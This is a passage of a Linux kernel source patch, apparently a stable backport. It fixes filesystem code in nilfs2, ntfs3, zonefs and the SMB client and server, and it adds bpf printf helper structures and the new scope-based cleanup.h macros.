++	 * Since checksumming including data blocks is performed to determine
++	 * the validity of the log to be written and used for recovery, it is
++	 * necessary to wait for writeback to finish here, regardless of the
++	 * stable write requirement of the backing device.
++	 */
++	wait_on_page_writeback(page);
+  out:
+ 	sb_end_pagefault(inode->i_sb);
+ 	return block_page_mkwrite_return(ret);
+diff --git a/fs/nilfs2/recovery.c b/fs/nilfs2/recovery.c
+index 0955b657938ff..a9b8d77c8c1d5 100644
+--- a/fs/nilfs2/recovery.c
++++ b/fs/nilfs2/recovery.c
+@@ -472,9 +472,10 @@ static int nilfs_prepare_segment_for_recovery(struct the_nilfs *nilfs,
+ 
+ static int nilfs_recovery_copy_block(struct the_nilfs *nilfs,
+ 				     struct nilfs_recovery_block *rb,
+-				     struct page *page)
++				     loff_t pos, struct page *page)
+ {
+ 	struct buffer_head *bh_org;
++	size_t from = pos & ~PAGE_MASK;
+ 	void *kaddr;
+ 
+ 	bh_org = __bread(nilfs->ns_bdev, rb->blocknr, nilfs->ns_blocksize);
+@@ -482,7 +483,7 @@ static int nilfs_recovery_copy_block(struct the_nilfs *nilfs,
+ 		return -EIO;
+ 
+ 	kaddr = kmap_atomic(page);
+-	memcpy(kaddr + bh_offset(bh_org), bh_org->b_data, bh_org->b_size);
++	memcpy(kaddr + from, bh_org->b_data, bh_org->b_size);
+ 	kunmap_atomic(kaddr);
+ 	brelse(bh_org);
+ 	return 0;
+@@ -521,7 +522,7 @@ static int nilfs_recover_dsync_blocks(struct the_nilfs *nilfs,
+ 			goto failed_inode;
+ 		}
+ 
+-		err = nilfs_recovery_copy_block(nilfs, rb, page);
++		err = nilfs_recovery_copy_block(nilfs, rb, pos, page);
+ 		if (unlikely(err))
+ 			goto failed_page;
+ 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index a4a147a983e0a..0a84613960dbf 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1702,7 +1702,6 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 
+ 		list_for_each_entry(bh, &segbuf->sb_payload_buffers,
+ 				    b_assoc_buffers) {
+-			set_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
+ 				if (bh->b_page != bd_page) {
+ 					lock_page(bd_page);
+@@ -1713,6 +1712,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 				}
+ 				break;
+ 			}
++			set_buffer_async_write(bh);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_begin_page_io(fs_page);
+ 				fs_page = bh->b_page;
+@@ -1798,7 +1798,6 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 
+ 		list_for_each_entry(bh, &segbuf->sb_payload_buffers,
+ 				    b_assoc_buffers) {
+-			clear_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
+ 				clear_buffer_uptodate(bh);
+ 				if (bh->b_page != bd_page) {
+@@ -1807,6 +1806,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 				}
+ 				break;
+ 			}
++			clear_buffer_async_write(bh);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_end_page_io(fs_page, err);
+ 				fs_page = bh->b_page;
+@@ -1894,8 +1894,9 @@ static void nilfs_segctor_complete_write(struct nilfs_sc_info *sci)
+ 				 BIT(BH_Delay) | BIT(BH_NILFS_Volatile) |
+ 				 BIT(BH_NILFS_Redirected));
+ 
+-			set_mask_bits(&bh->b_state, clear_bits, set_bits);
+ 			if (bh == segbuf->sb_super_root) {
++				set_buffer_uptodate(bh);
++				clear_buffer_dirty(bh);
+ 				if (bh->b_page != bd_page) {
+ 					end_page_writeback(bd_page);
+ 					bd_page = bh->b_page;
+@@ -1903,6 +1904,7 @@ static void nilfs_segctor_complete_write(struct nilfs_sc_info *sci)
+ 				update_sr = true;
+ 				break;
+ 			}
++			set_mask_bits(&bh->b_state, clear_bits, set_bits);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_end_page_io(fs_page, 0);
+ 				fs_page = bh->b_page;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 873b1434a9989..4b72bc7f12ca3 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1842,10 +1842,12 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+-	if (root_sdh->type != ATTR_ZERO ||
++	if (!(root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT))) ||
++	    root_sdh->type != ATTR_ZERO ||
+ 	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH ||
+-	    offsetof(struct INDEX_ROOT, ihdr) + root_sdh->ihdr.used > attr->res.data_size) {
++	    offsetof(struct INDEX_ROOT, ihdr) +
++			le32_to_cpu(root_sdh->ihdr.used) >
++			le32_to_cpu(attr->res.data_size)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -1861,10 +1863,12 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+-	if (root_sii->type != ATTR_ZERO ||
++	if (!(root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT))) ||
++	    root_sii->type != ATTR_ZERO ||
+ 	    root_sii->rule != NTFS_COLLATION_TYPE_UINT ||
+-	    offsetof(struct INDEX_ROOT, ihdr) + root_sii->ihdr.used > attr->res.data_size) {
++	    offsetof(struct INDEX_ROOT, ihdr) +
++			le32_to_cpu(root_sii->ihdr.used) >
++			le32_to_cpu(attr->res.data_size)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index b89a33f5761ef..7371f7855e4c4 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1097,7 +1097,8 @@ int indx_read(struct ntfs_index *indx, struct ntfs_inode *ni, CLST vbn,
+ 	}
+ 
+ 	/* check for index header length */
+-	if (offsetof(struct INDEX_BUFFER, ihdr) + ib->ihdr.used > bytes) {
++	if (offsetof(struct INDEX_BUFFER, ihdr) + le32_to_cpu(ib->ihdr.used) >
++	    bytes) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/proc/array.c b/fs/proc/array.c
+index 49283b8103c7e..1b0d78dfd20f9 100644
+--- a/fs/proc/array.c
++++ b/fs/proc/array.c
+@@ -501,7 +501,7 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	sigemptyset(&sigign);
+ 	sigemptyset(&sigcatch);
+-	cutime = cstime = utime = stime = 0;
++	cutime = cstime = 0;
+ 	cgtime = gtime = 0;
+ 
+ 	if (lock_task_sighand(task, &flags)) {
+@@ -535,7 +535,6 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 			min_flt += sig->min_flt;
+ 			maj_flt += sig->maj_flt;
+-			thread_group_cputime_adjusted(task, &utime, &stime);
+ 			gtime += sig->gtime;
+ 
+ 			if (sig->flags & (SIGNAL_GROUP_EXIT | SIGNAL_STOP_STOPPED))
+@@ -551,10 +550,13 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	if (permitted && (!whole || num_threads < 2))
+ 		wchan = !task_is_running(task);
+-	if (!whole) {
++
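++	/* Compute adjusted CPU times here, outside lock_task_sighand(). */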
++	if (whole) {
++		thread_group_cputime_adjusted(task, &utime, &stime);
++	} else {
++		task_cputime_adjusted(task, &utime, &stime);
+ 		min_flt = task->min_flt;
+ 		maj_flt = task->maj_flt;
+-		task_cputime_adjusted(task, &utime, &stime);
+ 		gtime = task_gtime(task);
+ 	}
+ 
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 5a132c1e6f6c4..6f4d7aa70e5a2 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -268,10 +268,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-	smb2_parse_contexts(server, o_rsp,
++	rc = smb2_parse_contexts(server, rsp_iov,
+ 			    &oparms.fid->epoch,
+-			    oparms.fid->lease_key, &oplock,
+-			    NULL, NULL);
++			    oparms.fid->lease_key,
++			    &oplock, NULL, NULL);
++	if (rc)
++		goto oshr_free;
+ 	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
+ 		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 5a157000bdfe6..34d1262004dfb 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -613,7 +613,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 		goto out;
+ 	}
+ 
+-	while (bytes_left >= sizeof(*p)) {
++	while (bytes_left >= (ssize_t)sizeof(*p)) {
+ 		memset(&tmp_iface, 0, sizeof(tmp_iface));
+ 		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
+ 		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index e65f998ea4cfc..c1fc1651d8b69 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -2145,17 +2145,18 @@ parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
+ 		 posix->nlink, posix->mode, posix->reparse_tag);
+ }
+ 
+-void
+-smb2_parse_contexts(struct TCP_Server_Info *server,
+-		    struct smb2_create_rsp *rsp,
+-		    unsigned int *epoch, char *lease_key, __u8 *oplock,
+-		    struct smb2_file_all_info *buf,
+-		    struct create_posix_rsp *posix)
++int smb2_parse_contexts(struct TCP_Server_Info *server,
++			struct kvec *rsp_iov,
++			unsigned int *epoch,
++			char *lease_key, __u8 *oplock,
++			struct smb2_file_all_info *buf,
++			struct create_posix_rsp *posix)
+ {
+-	char *data_offset;
++	struct smb2_create_rsp *rsp = rsp_iov->iov_base;
+ 	struct create_context *cc;
+-	unsigned int next;
+-	unsigned int remaining;
++	size_t rem, off, len;
++	size_t doff, dlen;
++	size_t noff, nlen;
+ 	char *name;
+ 	static const char smb3_create_tag_posix[] = {
+ 		0x93, 0xAD, 0x25, 0x50, 0x9C,
+@@ -2164,45 +2165,63 @@ smb2_parse_contexts(struct TCP_Server_Info *server,
+ 	};
+ 
+ 	*oplock = 0;
+-	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
+-	remaining = le32_to_cpu(rsp->CreateContextsLength);
+-	cc = (struct create_context *)data_offset;
++
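++	/* The create contexts must lie entirely within the response buffer. */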
++	off = le32_to_cpu(rsp->CreateContextsOffset);
++	rem = le32_to_cpu(rsp->CreateContextsLength);
++	if (check_add_overflow(off, rem, &len) || len > rsp_iov->iov_len)
++		return -EINVAL;
++	cc = (struct create_context *)((u8 *)rsp + off);
+ 
+ 	/* Initialize inode number to 0 in case no valid data in qfid context */
+ 	if (buf)
+ 		buf->IndexNumber = 0;
+ 
+-	while (remaining >= sizeof(struct create_context)) {
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) == 4 &&
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
+-			*oplock = server->ops->parse_lease_buf(cc, epoch,
+-							   lease_key);
+-		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
+-		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
+-			parse_query_id_ctxt(cc, buf);
+-		else if ((le16_to_cpu(cc->NameLength) == 16)) {
+-			if (posix &&
+-			    memcmp(name, smb3_create_tag_posix, 16) == 0)
++	while (rem >= sizeof(*cc)) {
++		doff = le16_to_cpu(cc->DataOffset);
++		dlen = le32_to_cpu(cc->DataLength);
++		if (check_add_overflow(doff, dlen, &len) || len > rem)
++			return -EINVAL;
++
++		noff = le16_to_cpu(cc->NameOffset);
++		nlen = le16_to_cpu(cc->NameLength);
++		if (noff + nlen > doff)
++			return -EINVAL;
++
++		name = (char *)cc + noff;
++		switch (nlen) {
++		case 4:
++			if (!strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4)) {
++				*oplock = server->ops->parse_lease_buf(cc, epoch,
++								       lease_key);
++			} else if (buf &&
++				   !strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4)) {
++				parse_query_id_ctxt(cc, buf);
++			}
++			break;
++		case 16:
++			if (posix && !memcmp(name, smb3_create_tag_posix, 16))
+ 				parse_posix_ctxt(cc, buf, posix);
++			break;
++		default:
++			cifs_dbg(FYI, "%s: unhandled context (nlen=%zu dlen=%zu)\n",
++				 __func__, nlen, dlen);
++			if (IS_ENABLED(CONFIG_CIFS_DEBUG2))
++				cifs_dump_mem("context data: ", cc, dlen);
++			break;
+ 		}
+-		/* else {
+-			cifs_dbg(FYI, "Context not matched with len %d\n",
+-				le16_to_cpu(cc->NameLength));
+-			cifs_dump_mem("Cctxt name: ", name, 4);
+-		} */
+-
+-		next = le32_to_cpu(cc->Next);
+-		if (!next)
++
++		off = le32_to_cpu(cc->Next);
++		if (!off)
+ 			break;
+-		remaining -= next;
+-		cc = (struct create_context *)((char *)cc + next);
++		if (check_sub_overflow(rem, off, &rem))
++			return -EINVAL;
++		cc = (struct create_context *)((u8 *)cc + off);
+ 	}
+ 
+ 	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		*oplock = rsp->OplockLevel;
+ 
+-	return;
++	return 0;
+ }
+ 
+ static int
+@@ -3082,8 +3101,8 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	}
+ 
+ 
+-	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
+-			    oparms->fid->lease_key, oplock, buf, posix);
++	rc = smb2_parse_contexts(server, &rsp_iov, &oparms->fid->epoch,
++				 oparms->fid->lease_key, oplock, buf, posix);
+ creat_exit:
+ 	SMB2_open_free(&rqst);
+ 	free_rsp_buf(resp_buftype, rsp);
+diff --git a/fs/smb/client/smb2proto.h b/fs/smb/client/smb2proto.h
+index be21b5d26f67e..b325fde010adc 100644
+--- a/fs/smb/client/smb2proto.h
++++ b/fs/smb/client/smb2proto.h
+@@ -249,11 +249,13 @@ extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
+ 
+ extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
+ 					enum securityEnum);
+-extern void smb2_parse_contexts(struct TCP_Server_Info *server,
+-				struct smb2_create_rsp *rsp,
+-				unsigned int *epoch, char *lease_key,
+-				__u8 *oplock, struct smb2_file_all_info *buf,
+-				struct create_posix_rsp *posix);
++int smb2_parse_contexts(struct TCP_Server_Info *server,
++			struct kvec *rsp_iov,
++			unsigned int *epoch,
++			char *lease_key, __u8 *oplock,
++			struct smb2_file_all_info *buf,
++			struct create_posix_rsp *posix);
++
+ extern int smb3_encryption_required(const struct cifs_tcon *tcon);
+ extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+ 			     struct kvec *iov, unsigned int min_buf_size);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 4cfa45c2727ea..66d25d0e34d8b 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -6171,8 +6171,10 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 		err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
+ 					     offsetof(struct smb2_read_rsp, Buffer),
+ 					     aux_payload_buf, nbytes);
+-		if (err)
++		if (err) {
++			kvfree(aux_payload_buf);
+ 			goto out;
++		}
+ 		kvfree(rpc_resp);
+ 	} else {
+ 		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
+@@ -6382,8 +6384,10 @@ int smb2_read(struct ksmbd_work *work)
+ 	err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
+ 				     offsetof(struct smb2_read_rsp, Buffer),
+ 				     aux_payload_buf, nbytes);
+-	if (err)
++	if (err) {
++		kvfree(aux_payload_buf);
+ 		goto out;
++	}
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+index 63cd50840419c..8d5f4a5a74e65 100644
+--- a/fs/zonefs/file.c
++++ b/fs/zonefs/file.c
+@@ -349,7 +349,12 @@ static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+ 	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+ 
+ 	if (error) {
+-		zonefs_io_error(inode, true);
++		/*
++		 * For Sync IOs, error recovery is called from
++		 * zonefs_file_dio_write().
++		 */
++		if (!is_sync_kiocb(iocb))
++			zonefs_io_error(inode, true);
+ 		return error;
+ 	}
+ 
+@@ -577,6 +582,14 @@ static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+ 			ret = -EINVAL;
+ 			goto inode_unlock;
+ 		}
++		/*
++		 * Advance the zone write pointer offset. This assumes that the
++		 * IO will succeed, which is OK to do because we do not allow
++		 * partial writes (IOMAP_DIO_PARTIAL is not set) and if the IO
++		 * fails, the error path will correct the write pointer offset.
++		 */
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
+ 		mutex_unlock(&zi->i_truncate_mutex);
+ 		append = sync;
+ 	}
+@@ -596,20 +609,19 @@ static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+ 			ret = -EBUSY;
+ 	}
+ 
+-	if (zonefs_zone_is_seq(z) &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		z->z_wpoffset += count;
+-		zonefs_inode_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
++	/*
++	 * For a failed IO or partial completion, trigger error recovery
++	 * to update the zone write pointer offset to a correct value.
++	 * For asynchronous IOs, zonefs_file_write_dio_end_io() may already
++	 * have executed error recovery if the IO already completed when we
++	 * reach here. However, we cannot know that, so we execute error
++	 * recovery again (which changes nothing if it already ran).
++	 */
++	if (zonefs_zone_is_seq(z)) {
++		if (ret > 0 && ret != count)
++			ret = -EIO;
++		if (ret < 0 && ret != -EIOCBQUEUED)
++			zonefs_io_error(inode, true);
+ 	}
+ 
+ inode_unlock:
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index 270ded209dde5..f6b701261078c 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -245,16 +245,18 @@ static void zonefs_inode_update_mode(struct inode *inode)
+ 	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
+ }
+ 
+-struct zonefs_ioerr_data {
+-	struct inode	*inode;
+-	bool		write;
+-};
+-
+ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 			      void *data)
+ {
+-	struct zonefs_ioerr_data *err = data;
+-	struct inode *inode = err->inode;
++	struct blk_zone *z = data;
++
++	*z = *zone;
++	return 0;
++}
++
++static void zonefs_handle_io_error(struct inode *inode, struct blk_zone *zone,
++				   bool write)
++{
+ 	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -269,8 +271,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+ 	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+-	    !err->write && isize == data_size)
+-		return 0;
++	    !write && isize == data_size)
++		return;
+ 
+ 	/*
+ 	 * At this point, we detected either a bad zone or an inconsistency
+@@ -291,7 +293,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zonefs_zone_is_seq(z) && isize != data_size)
++	if (isize != data_size)
+ 		zonefs_warn(sb,
+ 			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+@@ -351,8 +353,6 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	zonefs_i_size_write(inode, data_size);
+ 	z->z_wpoffset = data_size;
+ 	zonefs_inode_account_active(inode);
+-
+-	return 0;
+ }
+ 
+ /*
+@@ -366,23 +366,25 @@ void __zonefs_io_error(struct inode *inode, bool write)
+ {
+ 	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+-	unsigned int nr_zones = 1;
+-	struct zonefs_ioerr_data err = {
+-		.inode = inode,
+-		.write = write,
+-	};
++	struct blk_zone zone;
+ 	int ret;
+ 
+ 	/*
+-	 * The only files that have more than one zone are conventional zone
+-	 * files with aggregated conventional zones, for which the inode zone
+-	 * size is always larger than the device zone size.
++	 * Conventional zones have no write pointer and cannot become read-only
++	 * or offline. So simply fake a report for a single or aggregated zone
++	 * and let zonefs_handle_io_error() correct the zone inode information
++	 * according to the mount options.
+ 	 */
+-	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = z->z_size >>
+-			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
++	if (!zonefs_zone_is_seq(z)) {
++		zone.start = z->z_sector;
++		zone.len = z->z_size >> SECTOR_SHIFT;
++		zone.wp = zone.start + zone.len;
++		zone.type = BLK_ZONE_TYPE_CONVENTIONAL;
++		zone.cond = BLK_ZONE_COND_NOT_WP;
++		zone.capacity = zone.len;
++		goto handle_io_error;
++	}
+ 
+ 	/*
+ 	 * Memory allocations in blkdev_report_zones() can trigger a memory
+@@ -393,12 +395,20 @@ void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+-				  zonefs_io_error_cb, &err);
+-	if (ret != nr_zones)
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, 1,
++				  zonefs_io_error_cb, &zone);
++	memalloc_noio_restore(noio_flag);
++
++	if (ret != 1) {
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+ 			   inode->i_ino, ret);
+-	memalloc_noio_restore(noio_flag);
++		zonefs_warn(sb, "remounting filesystem read-only\n");
++		sb->s_flags |= SB_RDONLY;
++		return;
++	}
++
++handle_io_error:
++	zonefs_handle_io_error(inode, &zone, write);
+ }
+ 
+ static struct kmem_cache *zonefs_inode_cachep;
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 7ad6f51b3d914..1d1f480a5e9e4 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -351,7 +351,6 @@
+ 	*(.ref.data)							\
+ 	*(.data..shared_aligned) /* percpu related */			\
+ 	MEM_KEEP(init.data*)						\
+-	MEM_KEEP(exit.data*)						\
+ 	*(.data.unlikely)						\
+ 	__start_once = .;						\
+ 	*(.data.once)							\
+@@ -546,7 +545,6 @@
+ 	__init_rodata : AT(ADDR(__init_rodata) - LOAD_OFFSET) {		\
+ 		*(.ref.rodata)						\
+ 		MEM_KEEP(init.rodata)					\
+-		MEM_KEEP(exit.rodata)					\
+ 	}								\
+ 									\
+ 	/* Built-in module parameters. */				\
+@@ -601,7 +599,6 @@
+ 		*(.ref.text)						\
+ 		*(.text.asan.* .text.tsan.*)				\
+ 	MEM_KEEP(init.text*)						\
+-	MEM_KEEP(exit.text*)						\
+ 
+ 
+ /* sched.text is aligned to function alignment to secure we have same
+@@ -751,13 +748,10 @@
+ 	*(.exit.data .exit.data.*)					\
+ 	*(.fini_array .fini_array.*)					\
+ 	*(.dtors .dtors.*)						\
+-	MEM_DISCARD(exit.data*)						\
+-	MEM_DISCARD(exit.rodata*)
+ 
+ #define EXIT_TEXT							\
+ 	*(.exit.text)							\
+ 	*(.text.exit)							\
+-	MEM_DISCARD(exit.text)
+ 
+ #define EXIT_CALL							\
+ 	*(.exitcall.exit)
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index c04a61ffac8ae..1ca1902af23e9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -2739,10 +2739,18 @@ struct btf_id_set;
+ bool btf_id_set_contains(const struct btf_id_set *set, u32 id);
+ 
+ #define MAX_BPRINTF_VARARGS		12
++#define MAX_BPRINTF_BUF			1024
++
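++/*
++ * Scratch state passed to bpf_bprintf_prepare()/bpf_bprintf_cleanup().
++ * Callers set get_bin_args/get_buf to request the decoded argument array
++ * and/or the output buffer; cleanup releases whatever prepare set up.
++ */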
++struct bpf_bprintf_data {
++	u32 *bin_args;
++	char *buf;
++	bool get_bin_args;
++	bool get_buf;
++};
+ 
+ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+-			u32 **bin_buf, u32 num_args);
+-void bpf_bprintf_cleanup(void);
++			u32 num_args, struct bpf_bprintf_data *data);
++void bpf_bprintf_cleanup(struct bpf_bprintf_data *data);
+ 
+ /* the implementation of the opaque uapi struct bpf_dynptr */
+ struct bpf_dynptr_kern {
+diff --git a/include/linux/cleanup.h b/include/linux/cleanup.h
+new file mode 100644
+index 0000000000000..53f1a7a932b08
+--- /dev/null
++++ b/include/linux/cleanup.h
+@@ -0,0 +1,171 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __LINUX_GUARDS_H
++#define __LINUX_GUARDS_H
++
++#include <linux/compiler.h>
++
++/*
++ * DEFINE_FREE(name, type, free):
++ *	simple helper macro that defines the required wrapper for a __free()
++ *	based cleanup function. @free is an expression using '_T' to access
++ *	the variable.
++ *
++ * __free(name):
++ *	variable attribute to add a scoped based cleanup to the variable.
++ *
++ * no_free_ptr(var):
++ *	like a non-atomic xchg(var, NULL), such that the cleanup function will
++ *	be inhibited -- provided it sanely deals with a NULL value.
++ *
++ * return_ptr(p):
++ *	returns p while inhibiting the __free().
++ *
++ * Ex.
++ *
++ * DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++ *
++ *	struct obj *p __free(kfree) = kmalloc(...);
++ *	if (!p)
++ *		return NULL;
++ *
++ *	if (!init_obj(p))
++ *		return NULL;
++ *
++ *	return_ptr(p);
++ */
++
++#define DEFINE_FREE(_name, _type, _free) \
++	static inline void __free_##_name(void *p) { _type _T = *(_type *)p; _free; }
++
++#define __free(_name)	__cleanup(__free_##_name)
++
++#define no_free_ptr(p) \
++	({ __auto_type __ptr = (p); (p) = NULL; __ptr; })
++
++#define return_ptr(p)	return no_free_ptr(p)
++
++
++/*
++ * DEFINE_CLASS(name, type, exit, init, init_args...):
++ *	helper to define the destructor and constructor for a type.
++ *	@exit is an expression using '_T' -- similar to FREE above.
++ *	@init is an expression in @init_args resulting in @type
++ *
++ * EXTEND_CLASS(name, ext, init, init_args...):
++ *	extends class @name to @name@ext with the new constructor
++ *
++ * CLASS(name, var)(args...):
++ *	declare the variable @var as an instance of the named class
++ *
++ * Ex.
++ *
++ * DEFINE_CLASS(fdget, struct fd, fdput(_T), fdget(fd), int fd)
++ *
++ *	CLASS(fdget, f)(fd);
++ *	if (!f.file)
++ *		return -EBADF;
++ *
++ *	// use 'f' without concern
++ */
++
++#define DEFINE_CLASS(_name, _type, _exit, _init, _init_args...)		\
++typedef _type class_##_name##_t;					\
++static inline void class_##_name##_destructor(_type *p)			\
++{ _type _T = *p; _exit; }						\
++static inline _type class_##_name##_constructor(_init_args)		\
++{ _type t = _init; return t; }
++
++#define EXTEND_CLASS(_name, ext, _init, _init_args...)			\
++typedef class_##_name##_t class_##_name##ext##_t;			\
++static inline void class_##_name##ext##_destructor(class_##_name##_t *p)\
++{ class_##_name##_destructor(p); }					\
++static inline class_##_name##_t class_##_name##ext##_constructor(_init_args) \
++{ class_##_name##_t t = _init; return t; }
++
++#define CLASS(_name, var)						\
++	class_##_name##_t var __cleanup(class_##_name##_destructor) =	\
++		class_##_name##_constructor
++
++
++/*
++ * DEFINE_GUARD(name, type, lock, unlock):
++ *	trivial wrapper around DEFINE_CLASS() above specifically
++ *	for locks.
++ *
++ * guard(name):
++ *	an anonymous instance of the (guard) class
++ *
++ * scoped_guard (name, args...) { }:
++ *	similar to CLASS(name, scope)(args), except the variable (with the
++ *	explicit name 'scope') is declared in a for-loop such that its scope is
++ *	bound to the next (compound) statement.
++ *
++ */
++
++#define DEFINE_GUARD(_name, _type, _lock, _unlock) \
++	DEFINE_CLASS(_name, _type, _unlock, ({ _lock; _T; }), _type _T)
++
++#define guard(_name) \
++	CLASS(_name, __UNIQUE_ID(guard))
++
++#define scoped_guard(_name, args...)					\
++	for (CLASS(_name, scope)(args),					\
++	     *done = NULL; !done; done = (void *)1)
++
++/*
++ * Additional helper macros for generating lock guards with types, either for
